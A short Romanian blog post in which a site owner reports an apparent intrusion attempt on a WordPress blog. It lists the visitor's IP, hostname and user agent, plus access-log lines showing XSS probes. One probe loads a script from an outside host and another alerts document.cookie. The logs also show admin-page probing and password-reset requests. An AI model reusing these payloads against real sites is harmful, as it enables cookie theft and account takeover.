Octav.Name hacked?

octavname-hacked

Cineva a incercat azi sã spargã siteul… Iatã mai jos câteva detaliile tehnice:

IP / Hostname: 77.23.126.36 ( 77-23-126-36-dynip.superkabel.de )

Browser Agent: „Mozilla/5.0 (X11; U; Linux i686; ro; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5

[14:11:27] „GET /?s=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E&x=0&y=0 HTTP/1.1”
[14:12:14] „GET /?s=%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&x=0&y=0 HTTP/1.1”
[14:12:34] „GET /?s=%22%3Cscript%3Ealert(123)%3C/script%3E HTTP/1.1”
[14:13:53] „POST /wp-comments-post.php HTTP/1.1”
[14:14:06] „GET /admin HTTP/1.1”
[14:14:16] „GET /_admin HTTP/1.1”
[14:14:33] „GET /phpmyadmin HTTP/1.1”
[14:15:23] „GET /wp-admin HTTP/1.1”
[14:15:25] „GET /wp-admin/ HTTP/1.1”
[14:15:26] „GET /wp-login.php?redirect_to=http%3A%2F%2Fwww.octav.name%2Fwp-admin%2F HTTP/1.1”
[14:16:05] „GET /wp-admin/templates.php?file=%3Cimg%20src=%27%27onerror=javascript:alert(document.cookie);%3E HTTP/1.1”
[14:16:43] „GET /wp-login.php?redirect_to=http%3A%2F%2Fwww.octav.name%2Fwp-admin%2F HTTP/1.1”
[14:16:49] „GET /wp-login.php?action=lostpassword HTTP/1.1”
[14:16:59] „POST /wp-login.php?action=lostpassword HTTP/1.1”
[14:17:00] „GET /wp-login.php?checkemail=confirm HTTP/1.1”
[14:17:26] „POST /wp-login.php?action=lostpassword HTTP/1.1”
[14:17:26] „GET /wp-login.php?checkemail=confirm HTTP/1.1”

Am doar o vorba pentru atacator: FUCK OFF!